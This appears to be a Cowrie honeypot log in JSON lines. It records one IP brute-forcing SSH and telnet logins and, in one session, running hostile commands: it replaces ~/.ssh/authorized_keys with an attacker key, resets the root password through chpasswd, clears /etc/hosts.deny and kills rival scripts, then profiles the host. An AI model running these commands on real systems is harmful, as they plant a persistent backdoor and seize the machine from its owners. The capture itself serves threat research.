{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T21:53:45.365544Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T21:53:45.619202Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:45.620373Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46332,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a79d6a5180b","protocol":"ssh","message":"New connection: 212.227.235.229:46332 (1.2.3.4:22) [session: 9a79d6a5180b]","sensor":"my-vps","timestamp":"2025-09-08T21:53:45.867130Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:45.868215Z","src_ip":"212.227.235.229","session":"9a79d6a5180b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:46.123239Z","src_ip":"212.227.235.229","session":"9a79d6a5180b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T21:53:47.162631Z","src_ip":"212.227.235.229","session":"9a79d6a5180b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:48.414355Z","src_ip":"212.227.235.229","session":"9a79d6a5180b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46336,"dst_ip":"1.2.3.4","dst_port":22,"session":"d977b573fd4e","protocol":"ssh","message":"New connection: 212.227.235.229:46336 (1.2.3.4:22) [session: d977b573fd4e]","sensor":"my-vps","timestamp":"2025-09-08T21:53:48.664202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:48.667086Z","src_ip":"212.227.235.229","session":"d977b573fd4e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51282,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca7ed06dbf20","protocol":"ssh","message":"New connection: 212.227.235.229:51282 (1.2.3.4:22) [session: ca7ed06dbf20]","sensor":"my-vps","timestamp":"2025-09-08T21:53:49.653024Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:49.654475Z","src_ip":"212.227.235.229","session":"ca7ed06dbf20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:49.924607Z","src_ip":"212.227.235.229","session":"d977b573fd4e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:49.967175Z","src_ip":"212.227.235.229","session":"ca7ed06dbf20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44950,"dst_ip":"1.2.3.4","dst_port":22,"session":"8bdada35f6f5","protocol":"ssh","message":"New connection: 212.227.235.229:44950 (1.2.3.4:22) [session: 8bdada35f6f5]","sensor":"my-vps","timestamp":"2025-09-08T21:53:51.079643Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:51.080640Z","src_ip":"212.227.235.229","session":"8bdada35f6f5"}
{"eventid":"cowrie.login.failed","username":"dixi","password":"09N1RCa1Hs31","message":"login attempt [dixi/09N1RCa1Hs31] failed","sensor":"my-vps","timestamp":"2025-09-08T21:53:51.258305Z","src_ip":"212.227.235.229","session":"ca7ed06dbf20"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:51.335070Z","src_ip":"212.227.235.229","session":"8bdada35f6f5"}
{"eventid":"cowrie.login.failed","username":"anonymous","password":"2025","message":"login attempt [anonymous/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T21:53:52.396017Z","src_ip":"212.227.235.229","session":"8bdada35f6f5"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:52.571817Z","src_ip":"212.227.235.229","session":"ca7ed06dbf20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47836,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d87ee0d7787","protocol":"ssh","message":"New connection: 212.227.235.229:47836 (1.2.3.4:22) [session: 1d87ee0d7787]","sensor":"my-vps","timestamp":"2025-09-08T21:53:53.193295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T21:53:53.194025Z","src_ip":"212.227.235.229","session":"1d87ee0d7787"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T21:53:53.488184Z","src_ip":"212.227.235.229","session":"1d87ee0d7787"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:53.652232Z","src_ip":"212.227.235.229","session":"8bdada35f6f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51547,"dst_ip":"1.2.3.4","dst_port":23,"session":"5aee406c6dbe","protocol":"telnet","message":"New connection: 212.227.235.229:51547 (1.2.3.4:23) [session: 5aee406c6dbe]","sensor":"my-vps","timestamp":"2025-09-08T21:53:54.401595Z"}
{"eventid":"cowrie.login.failed","username":"muhamad","password":"12345","message":"login attempt [muhamad/12345] failed","sensor":"my-vps","timestamp":"2025-09-08T21:53:54.706309Z","src_ip":"212.227.235.229","session":"1d87ee0d7787"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:56.003449Z","src_ip":"212.227.235.229","session":"1d87ee0d7787"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:53:56.917685Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T21:53:56.918341Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:57.888010Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:58.573000Z","src_ip":"212.227.235.229","session":"d977b573fd4e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:53:58.656347Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"echo \"root:eJhP8pewI80y\"|chpasswd|bash","message":"CMD: echo \"root:eJhP8pewI80y\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T21:53:58.657316Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/768c65cfab1143bca6b033b963de969d893ac921419ec255cb1731a89aba53e5","size":21,"shasum":"768c65cfab1143bca6b033b963de969d893ac921419ec255cb1731a89aba53e5","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/768c65cfab1143bca6b033b963de969d893ac921419ec255cb1731a89aba53e5 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:58.910414Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:53:59.500455Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T21:53:59.501171Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T21:53:59.756944Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:53:59.757837Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:00.742471Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T21:54:00.743220Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:00.994211Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:01.586693Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T21:54:01.587501Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:02.560125Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:02.835380Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T21:54:02.836298Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T21:54:02.836878Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:03.090357Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:04.157281Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T21:54:04.157984Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:04.408123Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:05.905365Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T21:54:05.906075Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:06.158626Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:06.679516Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T21:54:06.680574Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:06.933288Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:07.530082Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T21:54:07.530769Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:08.495828Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T21:54:08.769258Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T21:54:08.769998Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 1.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T21:54:10.202368Z","src_ip":"212.227.235.229","session":"545490a25274"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49944,"dst_ip":"1.2.3.4","dst_port":22,"session":"7b3b125c7813","protocol":"ssh","message":"New connection: 212.227.235.229:49944 (1.2.3.4:22) [session: 7b3b125c7813]","sensor":"my-vps","timestamp":"2025-09-08T21:54:10.489300Z"}
